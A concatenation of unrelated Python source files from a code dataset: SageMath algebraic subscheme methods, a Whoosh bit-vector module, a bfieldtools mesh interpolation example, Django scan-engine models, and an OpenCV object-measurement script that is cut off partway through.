EXAMPLES::
sage: A.<x, y> = AffineSpace(2, ZZ)
sage: X = A.subscheme([x^2-y])
sage: Y = A.subscheme([y])
sage: X.intersection(Y)
Closed subscheme of Affine Space of dimension 2 over Integer Ring defined by:
x^2 - y,
y
"""
if not isinstance(other, AlgebraicScheme_subscheme):
raise TypeError("other (=%s) must be a closed algebraic subscheme of an ambient space"%other)
A = self.ambient_space()
if other.ambient_space() != A:
raise ValueError("other (=%s) must be in the same ambient space as self"%other)
return A.subscheme(self.defining_ideal() + other.defining_ideal())
def complement(self, other=None):
"""
Return the scheme-theoretic complement other - self, where
self and other are both closed algebraic subschemes of the
same ambient space.
If other is unspecified, it is taken to be the ambient space
of self.
EXAMPLES::
sage: A.<x, y, z> = AffineSpace(3, ZZ)
sage: X = A.subscheme([x+y-z])
sage: Y = A.subscheme([x-y+z])
sage: Y.complement(X)
Quasi-affine subscheme X - Y of Affine Space of
dimension 3 over Integer Ring, where X is defined by:
x + y - z
and Y is defined by:
x - y + z
sage: Y.complement()
Quasi-affine subscheme X - Y of Affine Space of
dimension 3 over Integer Ring, where X is defined by:
(no polynomials)
and Y is defined by:
x - y + z
sage: P.<x, y, z> = ProjectiveSpace(2, QQ)
sage: X = P.subscheme([x^2+y^2+z^2])
sage: Y = P.subscheme([x*y+y*z+z*x])
sage: Y.complement(X)
Quasi-projective subscheme X - Y of Projective Space of
dimension 2 over Rational Field, where X is defined by:
x^2 + y^2 + z^2
and Y is defined by:
x*y + x*z + y*z
sage: Y.complement(P)
Quasi-projective subscheme X - Y of Projective Space of
dimension 2 over Rational Field, where X is defined by:
(no polynomials)
and Y is defined by:
x*y + x*z + y*z
"""
A = self.ambient_space()
if other is None:
other = A.subscheme([])
elif not isinstance(other, AlgebraicScheme_subscheme):
if other == A:
other = A.subscheme([])
else:
raise TypeError("Argument other (=%s) must be a closed algebraic subscheme of an ambient space"%other)
if other.ambient_space() != A:
raise ValueError("other (=%s) must be in the same ambient space as self"%other)
return AlgebraicScheme_quasi(other, self)
def rational_points(self, **kwds):
"""
Return the rational points on the algebraic subscheme.
        For a dimension-0 subscheme, if the base ring is a numerical field
        such as ``ComplexField``, the results returned could be very far from correct.
        If the polynomials defining the subscheme are defined over a number field, you
        will get better results by calling ``rational_points`` with ``F`` set to that
        number field and the base ring as the field of definition. If the base ring
        is a number field, the embedding into ``F`` must be known.
        In the case of numerically approximated points, the points are returned as
        points of the ambient space.
INPUT:
kwds:
- ``bound`` - integer (optional, default=0). The bound for the coordinates for
subschemes with dimension at least 1.
- ``prec`` - integer (optional, default=53). The precision to use to
compute the elements of bounded height for number fields.
- ``F`` - field (optional, default=base ring). The field to compute
the rational points over.
- ``point_tolerance`` - positive real number (optional, default=10^(-10)).
For numerically inexact fields, two points are considered the same
if their coordinates are within tolerance.
- ``zero_tolerance`` - positive real number (optional, default=10^(-10)).
For numerically inexact fields, points are on the subscheme if they
satisfy the equations to within tolerance.
        - ``tolerance`` - a rational number in (0,1] used in the Doyle-Krumm algorithm-4
OUTPUT: list of points in subscheme or ambient space
.. WARNING::
For numerically inexact fields such as ComplexField or RealField the
list of points returned is very likely to be incomplete at best.
EXAMPLES:
Enumerate over a projective scheme over a number field::
sage: u = QQ['u'].0
sage: K.<v> = NumberField(u^2 + 3)
sage: A.<x,y> = ProjectiveSpace(K,1)
sage: X=A.subscheme(x^2 - y^2)
sage: X.rational_points(bound=3)
[(-1 : 1), (1 : 1)]
One can enumerate points up to a given bound on a projective scheme
over the rationals::
sage: E = EllipticCurve('37a')
sage: E.rational_points(bound=8)
[(-1 : -1 : 1), (-1 : 0 : 1), (0 : -1 : 1), (0 : 0 : 1), (0 : 1 : 0), (1/4 : -5/8 : 1),
(1/4 : -3/8 : 1), (1 : -1 : 1), (1 : 0 : 1), (2 : -3 : 1), (2 : 2 : 1)]
For a small finite field, the complete set of points can be
enumerated. ::
sage: Etilde = E.base_extend(GF(3))
sage: Etilde.rational_points()
[(0 : 0 : 1), (0 : 1 : 0), (0 : 2 : 1), (1 : 0 : 1),
(1 : 2 : 1), (2 : 0 : 1), (2 : 2 : 1)]
The class of hyperelliptic curves does not (yet) support
desingularization of the places at infinity into two points::
sage: FF = FiniteField(7)
sage: P.<x> = PolynomialRing(FiniteField(7))
sage: C = HyperellipticCurve(x^8+x+1)
sage: C.rational_points()
[(0 : 1 : 0), (0 : 1 : 1), (0 : 6 : 1), (2 : 0 : 1),
(4 : 0 : 1), (6 : 1 : 1), (6 : 6 : 1)]
::
sage: K.<v> = QuadraticField(-3)
sage: P.<x,y,z> = ProjectiveSpace(K, 2)
sage: X = P.subscheme([x^2 - v^2*x*z, y*x-v*z^2])
sage: X.rational_points(F=CC)
[(-3.00000000000000 : -0.577350269189626*I : 1.00000000000000),
(0.000000000000000 : 1.00000000000000 : 0.000000000000000)]
::
sage: K.<v> = QuadraticField(3)
sage: A.<x,y> = AffineSpace(K, 2)
sage: X = A.subscheme([x^2 - v^2*y, y*x-v])
sage: X.rational_points(F=RR)
[(1.73205080756888, 1.00000000000000)]
.. TODO::
Implement Stoll's model in weighted projective space to
resolve singularities and find two points (1 : 1 : 0) and
(-1 : 1 : 0) at infinity.
"""
F = kwds.pop('F', None)
if F is None: #sometimes None is passed in
F = self.base_ring()
if F in NumberFields() or F == ZZ:
X = self.base_extend(F)(F)
try:
return X.points(**kwds) # checks for proper bound done in points functions
except TypeError:
raise TypeError("Unable to enumerate points over %s."%F)
elif (self.base_ring() in NumberFields() or self.base_ring() == ZZ)\
and hasattr(F, 'precision'):
#we are numerically approximating number field points
return self(self.base_ring()).numerical_points(F=F, **kwds)
try:
X = self.base_extend(F)(F)
return X.points()
except TypeError:
raise TypeError("Unable to enumerate points over %s."%F)
def change_ring(self, R):
r"""
Returns a new algebraic subscheme which is this subscheme coerced to ``R``.
INPUT:
- ``R`` -- ring or morphism.
OUTPUT:
- A new algebraic subscheme which is this subscheme coerced to ``R``.
EXAMPLES::
sage: P.<x,y> = ProjectiveSpace(QQ, 1)
sage: X = P.subscheme([3*x^2-y^2])
sage: H = Hom(X,X)
sage: X.change_ring(GF(3))
Closed subscheme of Projective Space of dimension 1 over Finite Field of size 3 defined by:
-y^2
::
sage: K.<w> = QuadraticField(2)
sage: R.<z> = K[]
sage: L.<v> = K.extension(z^3-5)
sage: P.<x,y> = ProjectiveSpace(K, 1)
sage: X = P.subscheme(x - w*y)
sage: X.change_ring(L)
Closed subscheme of Projective Space of dimension 1 over Number Field in v with
defining polynomial z^3 - 5 over its base field defined by:
x + (-w)*y
::
sage: K.<w> = QuadraticField(2)
sage: R.<z> = K[]
sage: L.<v> = K.extension(z^3-5)
sage: P.<x,y,z> = AffineSpace(L,3)
sage: X = P.subscheme([x-w*y, z^2-v*x])
sage: emb = L.embeddings(QQbar)
sage: X.change_ring(emb[0])
Closed subscheme of Affine Space of dimension 3 over Algebraic Field
defined by:
x + (-1.414213562373095? + 0.?e-16*I)*y,
z^2 + (0.8549879733383485? + 1.480882609682365?*I)*x
::
sage: K.<w> = QuadraticField(2)
sage: R.<z> = K[]
sage: L.<v> = K.extension(z^3-5)
sage: P.<x,y,z> = AffineSpace(L,3)
sage: X = P.subscheme([x-w*y, z^2-v*x])
sage: emb = L.embeddings(QQbar)
sage: X.change_ring(emb[1])
Closed subscheme of Affine Space of dimension 3 over Algebraic Field
defined by:
x + (-1.414213562373095? + 0.?e-16*I)*y,
z^2 + (0.8549879733383485? - 1.480882609682365?*I)*x
::
sage: K.<w> = QuadraticField(-3)
sage: P.<x,y> = ProjectiveSpace(K, 1)
sage: X = P.subscheme(x-w*y)
sage: X.change_ring(CC)
Closed subscheme of Projective Space of dimension 1 over Complex Field
with 53 bits of precision defined by:
x + (-1.73205080756888*I)*y
::
sage: K.<w> = QuadraticField(3)
sage: P.<x,y> = ProjectiveSpace(K,1)
sage: X = P.subscheme(x-w*y)
sage: X.change_ring(RR)
Closed subscheme of Projective Space of dimension 1 over Real Field
with 53 bits of precision defined by:
x - 1.73205080756888*y
::
sage: K.<v> = CyclotomicField(7)
sage: O = K.maximal_order()
sage: P.<x,y> = ProjectiveSpace(O, 1)
sage: X = P.subscheme([x^2+O(v)*y^2])
sage: X.change_ring(CC)
Closed subscheme of Projective Space of dimension 1 over Complex Field
with 53 bits of precision defined by:
x^2 + (0.623489801858734 + 0.781831482468030*I)*y^2
sage: X.change_ring(K).change_ring(K.embeddings(QQbar)[0])
Closed subscheme of Projective Space of dimension 1 over Algebraic Field defined by:
x^2 + (-0.9009688679024191? - 0.4338837391175581?*I)*y^2
::
sage: R.<x> = QQ[]
sage: f = x^6-2
sage: L.<b> = NumberField(f, embedding=f.roots(CC)[2][0])
sage: A.<x,y> = AffineSpace(L, 2)
sage: H = Hom(A,A)
sage: X = A.subscheme([b*x^2, y^2])
sage: X.change_ring(CC)
Closed subscheme of Affine Space of dimension 2 over Complex Field with
53 bits of precision defined by:
(-0.561231024154687 - 0.972080648619833*I)*x^2,
y^2
"""
AS = self.ambient_space()
new_AS = AS.change_ring(R)
I = [f.change_ring(R) for f in self.defining_polynomials()]
return new_AS.subscheme(I)
def weil_restriction(self):
r"""
Compute the Weil restriction of this variety over some extension
field. If the field is a finite field, then this computes
the Weil restriction to the prime subfield.
A Weil restriction of scalars - denoted `Res_{L/k}` - is a
functor which, for any finite extension of fields `L/k` and
any algebraic variety `X` over `L`, produces another
corresponding variety `Res_{L/k}(X)`, defined over `k`. It is
useful for reducing questions about varieties over large
fields to questions about more complicated varieties over
smaller fields.
This function does not compute this Weil restriction directly
but computes on generating sets of polynomial ideals:
        Let `d` be the degree of the field extension `L/k`, let `a` be a
        generator of `L/k` and `p` the minimal polynomial of `a` over `k`.
        Denote the defining ideal of this subscheme by `I`.
Specifically, this function first maps each variable `x` to
its representation over `k`: `\sum_{i=0}^{d-1} a^i x_i`. Then
each generator of `I` is evaluated over these representations
and reduced modulo the minimal polynomial `p`. The result is
interpreted as a univariate polynomial in `a` and its
coefficients are the new generators of the returned ideal.
If the input and the output ideals are radical, this is
equivalent to the statement about algebraic varieties above.
OUTPUT: Affine subscheme - the Weil restriction of ``self``.
EXAMPLES::
sage: R.<x> = QQ[]
sage: K.<w> = NumberField(x^5-2)
sage: R.<x> = K[]
sage: L.<v> = K.extension(x^2+1)
sage: A.<x,y> = AffineSpace(L,2)
sage: X = A.subscheme([y^2-L(w)*x^3-v])
sage: X.weil_restriction()
Closed subscheme of Affine Space of dimension 4 over Number Field in w
with defining polynomial x^5 - 2 defined by:
(-w)*z0^3 + (3*w)*z0*z1^2 + z2^2 - z3^2,
(-3*w)*z0^2*z1 + (w)*z1^3 + 2*z2*z3 - 1
sage: X.weil_restriction().ambient_space() is A.weil_restriction()
True
::
sage: A.<x,y,z> = AffineSpace(GF(5^2,'t'),3)
sage: X = A.subscheme([y^2-x*z, z^2+2*y])
sage: X.weil_restriction()
Closed subscheme of Affine Space of dimension 6 over Finite Field of
size 5 defined by:
z2^2 - 2*z3^2 - z0*z4 + 2*z1*z5,
2*z2*z3 + z3^2 - z1*z4 - z0*z5 - z1*z5,
z4^2 - 2*z5^2 + 2*z2,
2*z4*z5 + z5^2 + 2*z3
"""
try:
X = self.__weil_restriction
except AttributeError:
L = self.base_ring()
if L.is_finite():
d = L.degree()
else:
d = L.relative_degree()
if d == 1:
X = self
else:
A = self.ambient_space().weil_restriction()
I = self.defining_ideal().weil_restriction()
X = A.subscheme(I)
self.__weil_restriction = X
return X
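    # Worked illustration of the substitution described in ``weil_restriction``:
    # for a quadratic extension L = k(a) with a^2 = -1, a variable x is written
    # as x0 + a*x1, so a defining polynomial such as x^2 + 1 expands to
    #     (x0^2 - x1^2 + 1) + a*(2*x0*x1),
    # and its two coefficients, x0^2 - x1^2 + 1 and 2*x0*x1, become generators
    # of the Weil restriction over k.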
def specialization(self, D=None, phi=None):
r"""
Specialization of this subscheme.
        Given a family of subschemes defined over a polynomial ring, a
        specialization is a particular member of that family. The specialization
        can be specified either by a dictionary or a :class:`SpecializationMorphism`.
INPUT:
- ``D`` -- dictionary (optional)
- ``phi`` -- SpecializationMorphism (optional)
        OUTPUT: :class:`AlgebraicScheme_subscheme` -- the specialized subscheme.
EXAMPLES::
sage: R.<c> = PolynomialRing(QQ)
sage: P.<x,y> = ProjectiveSpace(R, 1)
sage: X = P.subscheme([x^2 + c*y^2])
sage: X.specialization(dict({c:2}))
Closed subscheme of Projective Space of dimension 1 over Rational Field defined by:
x^2 + 2*y^2
::
sage: R.<c> = PolynomialRing(QQ)
sage: S.<a,b> = R[]
sage: P.<x,y,z> = AffineSpace(S,3)
sage: X = P.subscheme([x^2+a*c*y^2 - b*z^2])
sage: from sage.rings.polynomial.flatten import SpecializationMorphism
sage: phi = SpecializationMorphism(P.coordinate_ring(),dict({c:2,a:1}))
sage: X.specialization(phi=phi)
Closed subscheme of Affine Space of dimension 3 over Univariate Polynomial Ring in b over Rational Field defined by:
x^2 + 2*y^2 + (-b)*z^2
"""
if D is None:
if phi is None:
raise ValueError("either the dictionary or the specialization must be provided")
else:
from sage.rings.polynomial.flatten import SpecializationMorphism
phi = SpecializationMorphism(self.ambient_space().coordinate_ring(),D)
amb = self.ambient_space().change_ring(phi.codomain().base_ring())
return amb.subscheme([phi(g) for g in self.defining_polynomials()])
| 37.067731 | 174 | 0.553205 |
4a1b5eba9d064981f56ad861ceea7e885d37d92f | 8,276 | py | Python | lib/whoosh/support/bitvector.py | ckolumbus/WikidPad.svn | 8f03c1105a8144c9a82e392ab7f32e263c533775 | ["Apache-2.0"] | 2 | 2019-02-24T08:53:20.000Z | 2019-09-25T02:11:17.000Z | lib/whoosh/support/bitvector.py | ckolumbus/WikidPad.svn | 8f03c1105a8144c9a82e392ab7f32e263c533775 | ["Apache-2.0"] | null | null | null | lib/whoosh/support/bitvector.py | ckolumbus/WikidPad.svn | 8f03c1105a8144c9a82e392ab7f32e263c533775 | ["Apache-2.0"] | null | null | null |
"""
An implementation of an object that acts like a collection of on/off bits.
"""
import operator
from array import array
#: Table of the number of '1' bits in each byte (0-255)
BYTE_COUNTS = array('B', [
0, 1, 1, 2, 1, 2, 2, 3, 1, 2, 2, 3, 2, 3, 3, 4,
1, 2, 2, 3, 2, 3, 3, 4, 2, 3, 3, 4, 3, 4, 4, 5,
1, 2, 2, 3, 2, 3, 3, 4, 2, 3, 3, 4, 3, 4, 4, 5,
2, 3, 3, 4, 3, 4, 4, 5, 3, 4, 4, 5, 4, 5, 5, 6,
1, 2, 2, 3, 2, 3, 3, 4, 2, 3, 3, 4, 3, 4, 4, 5,
2, 3, 3, 4, 3, 4, 4, 5, 3, 4, 4, 5, 4, 5, 5, 6,
2, 3, 3, 4, 3, 4, 4, 5, 3, 4, 4, 5, 4, 5, 5, 6,
3, 4, 4, 5, 4, 5, 5, 6, 4, 5, 5, 6, 5, 6, 6, 7,
1, 2, 2, 3, 2, 3, 3, 4, 2, 3, 3, 4, 3, 4, 4, 5,
2, 3, 3, 4, 3, 4, 4, 5, 3, 4, 4, 5, 4, 5, 5, 6,
2, 3, 3, 4, 3, 4, 4, 5, 3, 4, 4, 5, 4, 5, 5, 6,
3, 4, 4, 5, 4, 5, 5, 6, 4, 5, 5, 6, 5, 6, 6, 7,
2, 3, 3, 4, 3, 4, 4, 5, 3, 4, 4, 5, 4, 5, 5, 6,
3, 4, 4, 5, 4, 5, 5, 6, 4, 5, 5, 6, 5, 6, 6, 7,
3, 4, 4, 5, 4, 5, 5, 6, 4, 5, 5, 6, 5, 6, 6, 7,
4, 5, 5, 6, 5, 6, 6, 7, 5, 6, 6, 7, 6, 7, 7, 8])
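# For example, BYTE_COUNTS[0b10110010] == 4, since the byte 178 has four '1'
# bits; BitVector.count() sums this table over the underlying bytes.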
class BitVector(object):
"""
Implements a memory-efficient array of bits.
>>> bv = BitVector(10)
>>> bv
<BitVector 0000000000>
>>> bv[5] = True
>>> bv
<BitVector 0000010000>
You can initialize the BitVector using an iterable of integers representing bit
positions to turn on.
>>> bv2 = BitVector(10, [2, 4, 7])
>>> bv2
    <BitVector 0010100100>
    >>> bv2[2]
True
BitVector supports bit-wise logic operations & (and), | (or), and ^ (xor)
between itself and another BitVector of equal size, or itself and a collection of
integers (usually a set() or frozenset()).
>>> bv | bv2
    <BitVector 0010110100>
Note that ``BitVector.__len__()`` returns the number of "on" bits, not
the size of the bit array. This is to make BitVector interchangeable with
a set()/frozenset() of integers. To get the size, use BitVector.size.
"""
def __init__(self, size, source=None, bits=None):
self.size = size
if bits:
self.bits = bits
else:
self.bits = array("B", ([0x00] * ((size >> 3) + 1)))
if source:
set = self.set
for num in source:
set(num)
self.bcount = None
def __eq__(self, other):
if isinstance(other, BitVector):
return self.bits == other.bits
return False
def __repr__(self):
return "<BitVector %s/%s>" % (len(self), self.size)
def __len__(self):
# This returns the count of "on" bits instead of the size to
# make BitVector exchangeable with a set() object.
return self.count()
def __contains__(self, index):
return self[index]
def __iter__(self):
get = self.__getitem__
for i in xrange(0, self.size):
if get(i):
yield i
def __str__(self):
get = self.__getitem__
return "".join("1" if get(i) else "0"
for i in xrange(0, self.size))
def __nonzero__(self):
return self.count() > 0
def __getitem__(self, index):
return self.bits[index >> 3] & (1 << (index & 7)) != 0
def __setitem__(self, index, value):
if value:
self.set(index)
else:
self.clear(index)
def _logic(self, op, bitv):
if self.size != bitv.size:
raise ValueError("Can't combine bitvectors of different sizes")
res = BitVector(size=self.size)
lpb = map(op, self.bits, bitv.bits)
res.bits = array('B', lpb)
return res
def union(self, other):
return self.__or__(other)
def intersection(self, other):
return self.__and__(other)
def __and__(self, other):
if not isinstance(other, BitVector):
other = BitVector(self.size, source=other)
return self._logic(operator.__and__, other)
def __or__(self, other):
if not isinstance(other, BitVector):
other = BitVector(self.size, source=other)
return self._logic(operator.__or__, other)
def __ror__(self, other):
return self.__or__(other)
def __rand__(self, other):
return self.__and__(other)
def __xor__(self, other):
if not isinstance(other, BitVector):
other = BitVector(self.size, source=other)
return self._logic(operator.__xor__, other)
def __invert__(self):
return BitVector(self.size, source=(x for x in xrange(self.size) if x not in self))
def count(self):
"""Returns the number of "on" bits in the bit array."""
if self.bcount is None:
self.bcount = sum(BYTE_COUNTS[b & 0xFF] for b in self.bits)
return self.bcount
def set(self, index):
"""Turns the bit at the given position on."""
if index >= self.size:
raise IndexError("Position %s greater than the size of the vector" % repr(index))
self.bits[index >> 3] |= 1 << (index & 7)
self.bcount = None
def clear(self, index):
"""Turns the bit at the given position off."""
self.bits[index >> 3] &= ~(1 << (index & 7))
self.bcount = None
def set_from(self, iterable):
"""Takes an iterable of integers representing positions, and turns
on the bits at those positions.
"""
set = self.set
for index in iterable:
set(index)
def copy(self):
"""Returns a copy of this BitArray."""
return BitVector(self.size, bits=self.bits)
class BitSet(object):
"""A set-like object for holding positive integers. It is dynamically
backed by either a set or BitVector depending on how many numbers are in
the set.
Provides ``add``, ``remove``, ``union``, ``intersection``,
    ``__contains__``, ``__len__``, ``__iter__``, ``__and__``, ``__or__``, and
    other set-like methods.
"""
def __init__(self, size, source=None):
self.size = size
self._back = ()
self._switch(size > 256)
if source:
for num in source:
self.add(num)
def _switch(self, toset):
if toset:
self._back = set(self._back)
self.add = self._set_add
self.remove = self._back.remove
else:
self._back = BitVector(self.size, source=self._back)
self.add = self._back.set
self.remove = self._vec_remove
self.__contains__ = self._back.__contains__
def __repr__(self):
return "<%s %s/%s>" % (self.__class__.__name__, len(self._back), self.size)
def __len__(self):
return len(self._back)
def __iter__(self):
return self._back.__iter__()
def as_set(self):
return frozenset(self._back)
def union(self, other):
return self.__or__(other)
def intersection(self, other):
return self.__and__(other)
def invert(self):
return BitSet(self.size, (x for x in xrange(self.size) if x not in self))
def __and__(self, other):
return BitSet(self.size, self._back.intersection(other))
def __or__(self, other):
return BitSet(self.size, self._back.union(other))
def __rand__(self, other):
return self.__and__(other)
def __ror__(self, other):
return self.__or__(other)
def __invert__(self):
return self.invert()
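    # Backend-switching heuristic: while set-backed, move to a BitVector once
    # 4 * len(elements) exceeds size/8 + 32; while vector-backed, move back to
    # a set once it drops below size/8 - 32. The +/-32 slack keeps the backend
    # from flapping right at the threshold.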
def _set_add(self, num):
self._back.add(num)
if len(self._back) * 4 > self.size // 8 + 32:
self._switch(False)
def _vec_remove(self, num):
self._back.clear(num)
if len(self._back) * 4 < self.size // 8 - 32:
self._switch(True)
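# Minimal usage sketch (illustrative values only): BitSet chooses its backend
# from the requested size, while BitVector is always the packed bit array.
if __name__ == "__main__":
    bs = BitSet(1000)                 # size > 256, so it starts on the set() backend
    for n in (3, 14, 159):
        bs.add(n)
    print(sorted(bs))                 # [3, 14, 159]
    bv = BitVector(8, source=[1, 3])
    print(bv.count())                 # 2
    print(3 in bv)                    # True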
| 30.538745 | 94 | 0.518246 |
4a1b5f57a8c99a13fea9173a4a9093d8cb6f5476 | 1,873 | py | Python | examples/misc_examples/interpolate_example.py | SAFedorov/bfieldtools | 7e64bc2033670f01d2b90df2210b60743731a948 | ["BSD-3-Clause"] | 17 | 2020-05-22T19:39:39.000Z | 2022-03-15T19:03:09.000Z | examples/misc_examples/interpolate_example.py | SAFedorov/bfieldtools | 7e64bc2033670f01d2b90df2210b60743731a948 | ["BSD-3-Clause"] | 27 | 2020-05-20T14:22:41.000Z | 2022-01-10T18:30:12.000Z | examples/misc_examples/interpolate_example.py | SAFedorov/bfieldtools | 7e64bc2033670f01d2b90df2210b60743731a948 | ["BSD-3-Clause"] | 8 | 2020-08-12T10:30:50.000Z | 2022-03-22T12:21:33.000Z |
"""
Interpolate stream function
===========================
Minimal example showing how to subdivide a mesh and interpolate a scalar function
defined on that mesh to match.
"""
from tvtk.api import tvtk
from mayavi import mlab
import trimesh
import numpy as np
from scipy.linalg import eigh
from bfieldtools.mesh_calculus import laplacian_matrix, mass_matrix
from bfieldtools import utils
import pkg_resources
#%%
# Load a simple mesh and compute an example scalar function on it.
# In this case, the scalar function is an eigenvector of a generalized eigenvalue decomposition
mesh = trimesh.load(
pkg_resources.resource_filename("bfieldtools", "example_meshes/10x10_plane.obj")
)
boundaries, inner_verts = utils.find_mesh_boundaries(mesh)
L = laplacian_matrix(mesh)
M = mass_matrix(mesh)
u, v = eigh(
-L.todense()[inner_verts][:, inner_verts], M.todense()[inner_verts][:, inner_verts]
)
scalars = np.zeros(mesh.vertices.shape[0])
scalars[inner_verts] = v[:, 12]
original_scalars = scalars.copy()
original_mesh = mesh.copy()
#%%
# Plot original scalars and mesh
scene = mlab.figure(None, bgcolor=(1, 1, 1), fgcolor=(0.5, 0.5, 0.5), size=(800, 800))
mlab.triangular_mesh(
*original_mesh.vertices.T,
original_mesh.faces,
scalars=original_scalars,
representation="wireframe"
)
#%%
# Now, interpolate scalars
ug = tvtk.UnstructuredGrid(points=mesh.vertices)
ug.set_cells(tvtk.Triangle().cell_type, mesh.faces)
ug.point_data.scalars = scalars
ug.point_data.scalars.name = "scalars"
mesh = original_mesh.subdivide().subdivide()
scalars = mlab.pipeline.probe_data(ug, *mesh.vertices.T)
#%%
# Plot subdivided mesh and interpolated scalars
scene = mlab.figure(None, bgcolor=(1, 1, 1), fgcolor=(0.5, 0.5, 0.5), size=(800, 800))
mlab.triangular_mesh(
*mesh.vertices.T, mesh.faces, scalars=scalars, representation="wireframe"
)
| 22.566265 | 95 | 0.735184 |
4a1b613195df3a16a647b846392ab647f1c2b0f5 | 951 | py | Python | scanEngine/models.py | Suprita-25/rengine | d6aabb49f27f7ad6039477c16a96213b0d80f81f | ["MIT"] | null | null | null | scanEngine/models.py | Suprita-25/rengine | d6aabb49f27f7ad6039477c16a96213b0d80f81f | ["MIT"] | null | null | null | scanEngine/models.py | Suprita-25/rengine | d6aabb49f27f7ad6039477c16a96213b0d80f81f | ["MIT"] | null | null | null |
from django.db import models
class EngineType(models.Model):
engine_name = models.CharField(max_length=200)
subdomain_discovery = models.BooleanField()
dir_file_search = models.BooleanField()
subdomain_takeover = models.BooleanField()
port_scan = models.BooleanField()
fetch_url = models.BooleanField()
yaml_configuration = models.TextField()
default_engine = models.BooleanField(null=True, default=False)
def __str__(self):
return self.engine_name
class Wordlist(models.Model):
name = models.CharField(max_length=200)
short_name = models.CharField(max_length=50, unique=True)
count = models.IntegerField(default=0)
def __str__(self):
return self.name
class Configuration(models.Model):
name = models.CharField(max_length=200)
short_name = models.CharField(max_length=50, unique=True)
content = models.TextField()
def __str__(self):
return self.name
| 27.970588 | 66 | 0.724501 |
4a1b63d761246f351ce1086a15165b3ddf3304a2 | 1,109 | py | Python | Exercicios Estruturas Logicas e Condicionais/exercicio 25 - secao 05.py | cristinamais/exercicios_python | 8a09b0b68ffaa62d13afb952998e890a79667c7e | ["MIT"] | null | null | null | Exercicios Estruturas Logicas e Condicionais/exercicio 25 - secao 05.py | cristinamais/exercicios_python | 8a09b0b68ffaa62d13afb952998e890a79667c7e | ["MIT"] | null | null | null | Exercicios Estruturas Logicas e Condicionais/exercicio 25 - secao 05.py | cristinamais/exercicios_python | 8a09b0b68ffaa62d13afb952998e890a79667c7e | ["MIT"] | null | null | null |
"""
25 - Calcule as raizes da equação de 2º grau.
lembrando que:
x = -b, + ou - raiz de delta / 2a. Onde:
raiz de delta = B² - 4ac.
E ax² + bx + c = 0 representa uma equação de 2º grau.
A variável de zero tem que ser diferente de zero. Caso seja igual, imprima a
mensagem "Não é equação de segundo grau."
Se Delta < 0, não existe real. Imprima não existe raiz.
Se Delta = 0, existe uma raiz real. Imprima a raiz e a mensagem Raiz única.
Se Delta >= 0, imprima as duas raízes reais
"""
import math
a = int(input("Digite o valor de a: "))
b = int(input("Digite o valor de b: "))
c = int(input("Digite o valor de c: "))
#ax² + bx + c = 0 --> é o que queremos saber.
#valor de delta: B² - 4ac.
delta = (b * b) + (-4 * a * c)
if delta > 0:
print(f'O valor de delta é {delta}')
x1 = (- b + (math.sqrt(delta))) / 2 * a
print(f'Essa é a primeira raiz quadrada, ou x1 {x1}')
x2 = (- b - (math.sqrt(delta))) / 2 * a
print(f'Essa é a segunda raiz quadrada, ou x2 {x2}')
elif delta == 0:
print(f'A raiz de delta é {delta} sendo Raiz única.')
else:
delta < 0
print('Não existe raiz')
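# Quick check with illustrative input: a=1, b=-3, c=2 gives delta=1, so the
# roots printed are x1 = 2.0 and x2 = 1.0.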
| 29.972973 | 76 | 0.625789 |
4a1b64773351b6a7ae40acf1eb8118c14f83366a | 4,054 | py | Python | src/testing/distance_measurement/object_size_example.py | wenksi/pren-robo-cube-ipcv | e2cf655a7e33aa63dae6e2b2a91abaa11d587f8f | ["MIT"] | null | null | null | src/testing/distance_measurement/object_size_example.py | wenksi/pren-robo-cube-ipcv | e2cf655a7e33aa63dae6e2b2a91abaa11d587f8f | ["MIT"] | null | null | null | src/testing/distance_measurement/object_size_example.py | wenksi/pren-robo-cube-ipcv | e2cf655a7e33aa63dae6e2b2a91abaa11d587f8f | ["MIT"] | null | null | null |
#https://www.pyimagesearch.com/2016/03/28/measuring-size-of-objects-in-an-image-with-opencv/
# import the necessary packages
from scipy.spatial import distance as dist
from imutils import perspective
from imutils import contours
import numpy as np
import argparse
import imutils
import cv2
def midpoint(ptA, ptB):
return ((ptA[0] + ptB[0]) * 0.5, (ptA[1] + ptB[1]) * 0.5)
# drawing parameters
fontColor = (255, 0, 0)
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
help="path to the input image")
ap.add_argument("-w", "--width", type=float, required=True,
help="width of the left-most object in the image (in inches)")
args = vars(ap.parse_args())
# load the image, convert it to grayscale, and blur it slightly
image = cv2.imread(args["image"])
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7), 0)
# perform edge detection, then perform a dilation + erosion to
# close gaps in between object edges
edged = cv2.Canny(gray, 50, 100)
edged = cv2.dilate(edged, None, iterations=1)
edged = cv2.erode(edged, None, iterations=1)
# find contours in the edge map
cnts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
# sort the contours from left-to-right and initialize the
# 'pixels per metric' calibration variable
(cnts, _) = contours.sort_contours(cnts)
pixelsPerMetric = None
# loop over the contours individually
for c in cnts:
# if the contour is not sufficiently large, ignore it
if cv2.contourArea(c) < 100:
continue
# compute the rotated bounding box of the contour
orig = image.copy()
box = cv2.minAreaRect(c)
box = cv2.cv.BoxPoints(box) if imutils.is_cv2() else cv2.boxPoints(box)
box = np.array(box, dtype="int")
# order the points in the contour such that they appear
# in top-left, top-right, bottom-right, and bottom-left
# order, then draw the outline of the rotated bounding
# box
box = perspective.order_points(box)
cv2.drawContours(orig, [box.astype("int")], -1, (0, 255, 0), 2)
# loop over the original points and draw them
for (x, y) in box:
cv2.circle(orig, (int(x), int(y)), 5, (0, 0, 255), -1)
# unpack the ordered bounding box, then compute the midpoint
# between the top-left and top-right coordinates, followed by
# the midpoint between bottom-left and bottom-right coordinates
(tl, tr, br, bl) = box
(tltrX, tltrY) = midpoint(tl, tr)
(blbrX, blbrY) = midpoint(bl, br)
    # compute the midpoint between the top-left and bottom-left points,
    # followed by the midpoint between the top-right and bottom-right
(tlblX, tlblY) = midpoint(tl, bl)
(trbrX, trbrY) = midpoint(tr, br)
# draw the midpoints on the image
cv2.circle(orig, (int(tltrX), int(tltrY)), 5, (255, 0, 0), -1)
cv2.circle(orig, (int(blbrX), int(blbrY)), 5, (255, 0, 0), -1)
cv2.circle(orig, (int(tlblX), int(tlblY)), 5, (255, 0, 0), -1)
cv2.circle(orig, (int(trbrX), int(trbrY)), 5, (255, 0, 0), -1)
# draw lines between the midpoints
cv2.line(orig, (int(tltrX), int(tltrY)), (int(blbrX), int(blbrY)),
